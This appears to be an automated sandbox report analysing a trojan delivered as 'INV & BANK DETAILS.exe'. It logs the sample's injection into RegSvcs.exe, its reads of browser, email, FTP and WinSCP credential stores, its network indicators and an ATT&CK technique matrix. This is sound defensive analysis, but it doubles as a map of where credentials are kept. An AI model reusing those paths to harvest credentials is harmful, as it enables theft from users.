                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INV & BANK DETAILS.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
                  Source: INV & BANK DETAILS.exeBinary or memory string: Shell_TrayWnd
                  Source: INV & BANK DETAILS.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,2_2_00417A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3866572606.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3866572606.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3284, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: INV & BANK DETAILS.exeBinary or memory string: WIN_XP
                  Source: INV & BANK DETAILS.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                  Source: INV & BANK DETAILS.exeBinary or memory string: WIN_XPe
                  Source: INV & BANK DETAILS.exeBinary or memory string: WIN_VISTA
                  Source: INV & BANK DETAILS.exeBinary or memory string: WIN_7
                  Source: INV & BANK DETAILS.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3866572606.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3284, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3866572606.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3866572606.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3284, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.275f906.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3ac4990.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4ff0000.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.4f30ee8.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.27607ee.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a76458.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.3a75570.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
                  Source: C:\Users\user\Desktop\INV & BANK DETAILS.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  121
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  1
                  Exfiltration Over Alternative Protocol
                  1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  11
                  Deobfuscate/Decode Files or Information
                  121
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter
                  Logon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  1
                  Credentials in Registry
                  2
                  File and Directory Discovery
                  SMB/Windows Admin Shares1
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  Software Packing
                  NTDS138
                  System Information Discovery
                  Distributed Component Object Model121
                  Input Capture
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets451
                  Security Software Discovery
                  SSH3
                  Clipboard Data
                  12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials131
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Network Configuration Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  INV & BANK DETAILS.exe63%ReversingLabsWin32.Trojan.AutoitInject
                  INV & BANK DETAILS.exe100%AviraHEUR/AGEN.1321703
                  INV & BANK DETAILS.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  http://ftp.jeepcommerce.rs100%Avira URL Cloudmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ftp.jeepcommerce.rs
                  195.252.110.253
                  truefalse
                    high
                    ip-api.com
                    208.95.112.1
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      http://ip-api.com/line/?fields=hostingfalse
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://ftp.jeepcommerce.rsRegSvcs.exe, 00000002.00000002.3866572606.0000000002ACE000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://account.dyn.com/RegSvcs.exe, 00000002.00000002.3866373023.000000000271F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868050864.0000000004F30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3867642988.0000000003A71000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3868460537.0000000004FF0000.00000004.08000000.00040000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.3866572606.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://ip-api.comRegSvcs.exe, 00000002.00000002.3866572606.0000000002A71000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              ip-api.comUnited States
                              53334TUT-ASUSfalse
                              195.252.110.253
                              ftp.jeepcommerce.rsSerbia
                              6700BEOTEL-AShttpwwwbeotelnetRSfalse
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1554927
                              Start date and time:2024-11-13 08:29:15 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 4s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:INV & BANK DETAILS.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/4@2/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 96%
                              • Number of executed functions: 60
                              • Number of non-executed functions: 295
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: INV & BANK DETAILS.exe
                              TimeTypeDescription
                              02:30:14API Interceptor11649154x Sleep call for process: RegSvcs.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
